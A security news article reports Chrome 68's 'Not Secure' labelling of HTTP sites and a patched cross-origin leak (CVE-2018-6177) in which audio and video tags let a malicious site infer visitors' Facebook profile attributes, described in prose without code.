In response to emerging security concerns, Google has underscored the importance of using HTTPS by marking all non-HTTPS websites as ‘Not Secure’ in its Chrome 68 browser update. This shift aims to enhance the security landscape for internet users. Additionally, the upgraded version addresses critical vulnerabilities that may put private data at risk.
Ron Masas, a security researcher with Imperva, uncovered a concerning flaw within web browsers, enabling attackers to access extensive information held by platforms like Facebook and Google—often with nothing more than a coercive click on a link. The identified vulnerability, known as CVE-2018-6177, exploits weaknesses in audio and video HTML tags, affecting all browsers that utilize the Blink Engine, including Google Chrome.
To exemplify the vulnerability, Masas referenced Facebook, a leading social media platform that gathers extensive profiling data from its users, including demographics and location history. Facebook provides page administrators with tools to target posts based on user attributes such as age, location, gender, and interests.
Understanding the mechanics behind this attack reveals that by crafting posts with specific audience restrictions, an attacker can gauge user data based on which posts load successfully on their site. If a post is set to display only to a specific demographic—say, male users aged 26 interested in cybersecurity—an attacker can extract revealing information about visitors who match those criteria, regardless of their privacy settings.
This seemingly straightforward method, unfortunately, lacks effective countermeasures for website administrators to determine which specific users see which embedded posts. However, the Cross-Origin Resource Sharing (CORS) protocol, designed as a browser security measure to restrict cross-site content access, had gaps that were exploited through the described vulnerability.
Masas demonstrated that, without proper validation of resource content types, hidden audio or video tags could be deployed on a malicious website to request Facebook posts. While the content may not display as intended, attackers could use JavaScript to track the size of cross-origin resources and requests, revealing which posts were successfully fetched for each visitor.
According to Masas, attackers can deploy multiple scripts targeting different profile restrictions simultaneously, through which they can mine substantial private data. This exploitation shares characteristics with previous cross-origin vulnerabilities that enabled unauthorized access to sensitive information, such as email and private messages.
The findings were reported to Google, resulting in a subsequent patch rolled out in the Chrome 68 release. Users are strongly encouraged to update to the latest version of Chrome to ensure protection against these vulnerabilities.
In light of these developments, business owners should remain vigilant against potential threats. The tactics illustrated in this scenario could involve initial access and credential access from the MITRE ATT&CK framework, highlighting the methods used by adversaries to exploit browser vulnerabilities. Ensuring all systems are up to date is crucial for maintaining cybersecurity integrity.
